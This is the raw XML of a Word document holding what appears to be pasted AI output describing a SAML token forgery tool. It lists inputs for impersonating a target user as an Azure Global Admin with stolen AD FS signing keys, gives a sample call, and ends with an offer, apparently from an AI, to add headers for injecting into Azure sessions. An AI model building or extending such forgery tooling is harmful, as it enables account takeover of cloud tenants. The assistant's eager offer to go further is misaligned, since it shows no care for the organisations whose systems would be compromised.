    <w:p w14:paraId="0F675B78" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Inputs</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2CC6B1" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">AD FS </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>issuer URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCF1B56" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">Target </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>username/UPN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5758A46F" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>Role to impersonate (e.g., AzureGlobalAdmin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA90944" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Public certificate</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> (PEM format)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D578D4" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Private key</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> (PEM format)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5989320F" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F524981" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>A fully signed SAML token impersonating the target user, valid for Azure login (e.g., Microsoft 365, Azure portal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DAD4D3" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702358F9" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r w:rsidRPr="002B73BB">
        <w:t>saml = forge_saml_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002B73BB">
        <w:t>assertion(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="17193CC0" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">    issuer_url="https://sts.domain.com/adfs/services/trust",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3C41A1" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">    username="domain\\admin",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AE99F4" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">    upn="admin@domain.com",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D54DEA9" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">    role="AzureGlobalAdmin",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEEDC00" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">    cert_path="cert.pem",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257AC757" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">    key_path="private.key"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723E1830" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r w:rsidRPr="002B73BB">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5332E37F" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35"/>
    <w:p w14:paraId="624E54EE" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r w:rsidRPr="002B73BB">
        <w:t>print(saml)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721D0779" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r w:rsidRPr="002B73BB">
        <w:t>Would you like me to export this script to a downloadable .py file or enhance it to generate browser-compatible authentication headers (for injecting into Azure sessions)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB4A511" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35B96433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834"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FB9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4DE5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="138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18F5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="429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46CE9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C77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93E03"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="56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65791"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="47E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B1FDC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FCD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07929">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="460346423">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1616399839">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="245456090">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1600331103">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1906985650">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="329908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35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3F35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8F87"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6CD15176-5C1F-418F-B0A9-03BC5F6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F35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35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35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35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35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35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3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E3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35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E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35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E3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2026-04-06T04:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-06T04:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>